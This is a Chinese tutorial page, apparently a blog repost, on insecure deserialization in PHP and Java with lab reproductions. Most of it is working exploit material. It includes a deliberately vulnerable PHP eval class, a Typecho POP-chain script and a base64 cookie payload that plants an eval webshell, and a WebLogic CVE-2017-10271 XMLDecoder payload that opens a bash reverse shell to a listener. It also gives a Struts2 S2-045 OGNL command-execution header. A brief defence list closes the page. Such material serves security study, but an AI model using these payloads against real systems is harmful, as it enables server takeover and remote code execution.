s:4:“name”;s:5:“AJEST”;是一個(gè)鍵值對(duì)

s:3:“age”;i:24;是一個(gè)鍵值對(duì)

s:3:“sex”;b:1;是一個(gè)鍵值對(duì)

s:5:“score”;d:99.900000000000006;是一個(gè)鍵值對(duì)

O：序列化后的對(duì)象object

3：類(lèi)名的長(zhǎng)度，類(lèi)有幾個(gè)字符

stu：類(lèi)的名字

4：有四個(gè)變量

s：string（字符串）

4：name的長(zhǎng)度是4

s：string（字符串）

5：AJEST的長(zhǎng)度是5

s：string（字符串）

3：age的長(zhǎng)度是3

i：int

24：age的值

s：string（字符串）

3：age的長(zhǎng)度是3

b：bool（布爾）

1：布爾值

s：string（字符串）

5：score的長(zhǎng)度是5

d：double

99.900000000000006：score的值

1.2.3 反序列化

將字符串轉(zhuǎn)化為對(duì)象。

//   unserialize.php

include "./stu.class.php";

$stu1_ser = 'O:3:"Stu":4:{s:4:"name";s:5:"AJEST";s:3:"age";i:24;s:3:"sex";b:1;s:5:"score";d:99.900000000000006;}';

$stu1_obj = unserialize($stu1_ser); var_dump($stu1_obj);

在www下新建unserialize.php文件，將上述代碼復(fù)制進(jìn)unserialize.php文件中

1.2.4 對(duì)象注入

如果反序列化字符串，Web 用戶(hù)可以控制，則造成對(duì)象注入。

// $stu1_seria = 'O:3:"Stu":4: {s:4:"name";s:5:"AJEST";s:3:"age";i:24;s:3:"sex";b:1;s:5:"score";d:99.900000000000006;}';
$stu1_ser = $_GET['stu1_ser'];

http://127.0.0.1/unserialize/unserialize.php?stu1_ser=O:3:"Stu":4:{s:4:"name";s:5:"AJEST";s:3:"age";i:24;s:3:"sex";b:1;s:5:"score";d:99.900000000000006;}

PHP 的反序列化漏洞也叫PHP 對(duì)象注入，是一個(gè)非常常見(jiàn)的漏洞，這種漏洞在某些場(chǎng)景下雖然有些難以利用，但是一旦利用成功就會(huì)造成非常危險(xiǎn)的后果

2. 漏洞何在

2.1 漏洞觸發(fā)

2.1.1 有一個(gè)類(lèi)

//   vul.class.php

class Vul{
public $str = "AJEST";

function __destruct(){
//echo "This is function __destruct()"; 
@eval($this -> str);//eval，危險(xiǎn)語(yǔ)句，將字符串當(dāng)作PHP代碼執(zhí)行

}
}

在www下新建vul.class.php文件，將上述代碼復(fù)制進(jìn)vul.class.php文件中

2.1.2 有一個(gè)對(duì)象

// test.php

include './vul.class.php';

$s = new Vul(); //從vul這個(gè)類(lèi)中創(chuàng)建一個(gè)對(duì)象$s
echo serialize($s); //對(duì)$s進(jìn)行序列化操作后輸出
echo "<hr />";

$_s = $_GET['s_ser'];//通過(guò)get方式得到s_ser參數(shù)
$s = unserialize($_s);//將$_S的值進(jìn)行反序列化 
var_dump($s);//將反序列化的內(nèi)容輸出

在www下新建test.php文件，將上述代碼復(fù)制進(jìn)test.php文件中

序列化后：

O:3:"Vul":1:{s:3:"str";s:5:"AJEST";}

2.1.3 反序列化執(zhí)行代碼

?s_ser=O:3:"Vul":1:{s:3:"str";s:10:"phpinfo();";}

2.2 為什么會(huì)這樣

__destruct()，會(huì)被對(duì)象自動(dòng)調(diào)用。

以 __ 開(kāi)頭的函數(shù)，是PHP 中的魔術(shù)方法。類(lèi)中的魔術(shù)方法，在特定情況下會(huì)自動(dòng)調(diào)用。即使魔術(shù)方法在類(lèi)中沒(méi)有被定義，也是真實(shí)存在的。

__call();
__callStatic(); 
__get(); 
__set();
__isset();
__unset(); 
__sleep(); 
__wakeup();					創(chuàng)建對(duì)象之前觸發(fā)
__toString(); 
__invoke(); 
__set_state(); 
__clone(); 
__debuginfo();
 

因?yàn)?code>__destruct()：在銷(xiāo)毀對(duì)象時(shí)自動(dòng)調(diào)用，并且腳本執(zhí)行完后要銷(xiāo)毀，所以 __destruct() 執(zhí)行了

銷(xiāo)毀的兩個(gè)對(duì)象分別是在調(diào)用vul類(lèi)時(shí)創(chuàng)建的對(duì)象和進(jìn)行反序列化還原的對(duì)象

漏洞形成的根本原因:

程序沒(méi)有對(duì)用戶(hù)輸入的反序列化字符串進(jìn)行檢測(cè)，導(dǎo)致反序列化過(guò)程可以被惡意控制，進(jìn)而造成代碼執(zhí)行、GetShell 等一系列不可控的后果。反序列化漏洞并不是PHP 特有的，也存在于Java、Python 語(yǔ)言中，其原理基本相同。

3. 反序列化漏洞攻防

3.1 PHP 反序列化實(shí)例

typecho 反序列化漏洞

3.1.1 環(huán)境搭建

3.1.2 實(shí)操

危險(xiǎn)函數(shù)：call_user_func（回調(diào)函數(shù)）,assert（將字符串當(dāng)作php代碼執(zhí)行）

call_user_func('assert',"phpinfo()");

這句函數(shù)相當(dāng)于

assert(phpinfo());

使用call_user_func（回調(diào)函數(shù)）可以構(gòu)造一句話(huà)木馬

typecho 反序列化漏洞此文章中提到typecho中有魔術(shù)方法，并且含有call_user_func（回調(diào)函數(shù)），并且typecho反序列化漏洞使用了對(duì)象注入

如果構(gòu)造的序列化后的語(yǔ)句中的類(lèi)注入對(duì)象中沒(méi)有那么就會(huì)還原成一個(gè)不知道是什么的類(lèi)

利用漏洞利用腳本

<?php
class Typecho_Feed{
	const RSS1 = 'RSS 1.0';
	const RSS2 = 'RSS 2.0';
	const ATOM1 = 'ATOM 1.0';
   	const DATE_RFC822 = 'r';
	const DATE_W3CDTF = 'c';
	const EOL = "\n";
	private $_type;
	private $_items;
	
	public function __construct(){
		$this->_type = $this::RSS2;
		$this->_items[0] = array(
			'title' => '1',
			'link' => '1',
			'date' => 1508895132,
			'category' => array(new Typecho_Request()),
			'author' => new Typecho_Request(),
		);
	}
}

class Typecho_Request{
	private $_params = array();
	private $_filter = array();

	public function __construct(){
		$this->_params['screenName'] = 'phpinfo()';
		$this->_filter[0] = 'assert';//有危險(xiǎn)函數(shù)
    }
}

$exp = array(
	'adapter' => new Typecho_Feed(),
	'prefix' => 'typecho_'
);

echo base64_encode(serialize($exp));
?>

將上述代碼復(fù)制到www目錄下的typecho_1.0(14.10.10)_unserialize_phpinfo.php文件中，執(zhí)行typecho_1.0(14.10.10)_unserialize_phpinfo.php獲得經(jīng)過(guò)base64編碼的序列化的字符串，構(gòu)造的這個(gè)字符串中的類(lèi)一定是typecho中存在的類(lèi)的名字，否則序列化字符串在注入的時(shí)候會(huì)注入不進(jìn)去

YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUwODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30=

typecho的漏洞點(diǎn)是install.php頁(yè)面，通過(guò)finish參數(shù)傳遞

文章中使用GET方式提交的，也可以使用POST方式提交，提交的內(nèi)容通過(guò)__typecho_config傳遞

3.1.3 GETshell

使用bp抓包，將數(shù)據(jù)包發(fā)送重發(fā)器，修改cookie

__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mzp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6MTp7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NjA6ImZpbGVfcHV0X2NvbnRlbnRzKCdTaGVsbC5waHAnLCc8P3BocCBAZXZhbCgkX1BPU1RbNjY2XSk7Pz4nKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX1zOjEwOiJkYXRlRm9ybWF0IjtOO31zOjY6InByZWZpeCI7czo4OiJ0eXBlY2hvXyI7fQ==

點(diǎn)擊發(fā)送

使用蟻劍進(jìn)行連接

3.2 Java 反序列化實(shí)例

Weblogic < 10.3.6 ‘wls-wsat’ XMLDecoder 反序列化漏洞

S2-045 Remote Code Execution Vulnerablity

JBoss 5.x/6.x 反序列化漏洞

fastjson 1.2.24 反序列化導(dǎo)致任意命令執(zhí)?漏洞

Fastjson 1.2.47 遠(yuǎn)程命令執(zhí)?漏洞

Apache Shiro 1.2.4反序列化漏洞（CVE-2016-4437）

3.2.1 Weblogic

3.2.1.1 環(huán)境搭建

進(jìn)入漏洞庫(kù)啟動(dòng)環(huán)境

3.2.1.2 過(guò)程

訪問(wèn)本機(jī)地址的7001端口的/console頁(yè)面

漏洞掃描工具：nacs和weblogicScan

使用nacs工具掃描IP和端口

使用weblogicScan工具掃描

復(fù)現(xiàn)2017-10271，訪問(wèn)wls-wsat/CoordinatorPortType頁(yè)面

使用bp抓包，發(fā)送重發(fā)器

將數(shù)據(jù)包改為POST請(qǐng)求

將漏洞利用代碼復(fù)制到POST請(qǐng)求數(shù)據(jù)包中，漏洞利用代碼是輸入一個(gè)周期性計(jì)劃任務(wù)，通過(guò)21端口獲得反彈shell

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.16.176/21 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

還是報(bào)錯(cuò)，因?yàn)樘峤坏拇a是xml語(yǔ)言格式的

修改POST數(shù)據(jù)包

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.16.176:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ADMINCONSOLESESSION=qZfqk3sDhfVMkMlb3LMJpxzDJxgBrDwNqFCyGFZh339bGMLY0G1r!-169694376
Connection: close
Content-Type: text/xml
Content-Length: 631

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.16.176/21 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

使用瑞士軍刀掃描21端口

nc -lnvp 21

3.2.2 S2

3.2.2.1 環(huán)境搭建

因?yàn)?080端口被bp占用，修改端口

3.2.2.2 過(guò)程

使用nacs掃描

訪問(wèn)本機(jī)IP908端口，使用bp抓包發(fā)送重發(fā)器，改為POST請(qǐng)求，并將漏洞利用代碼復(fù)制到數(shù)據(jù)包中

漏洞利用：S2-045、S2-046 - 京亟QAQ - 博客園 (cnblogs.com)

Content-Type:  %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

修改POST數(shù)據(jù)包，并點(diǎn)擊發(fā)送

獲得回顯，修改whoami，相當(dāng)于獲得一個(gè)shell

3.3 反序列化漏洞防御

• 升級(jí)組件到最新版本

• 黑白名單過(guò)濾敏感字符

• 禁用反序列化功能文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-698396.html

到了這里，關(guān)于不安全的反序列化(php&java)及漏洞復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容，請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！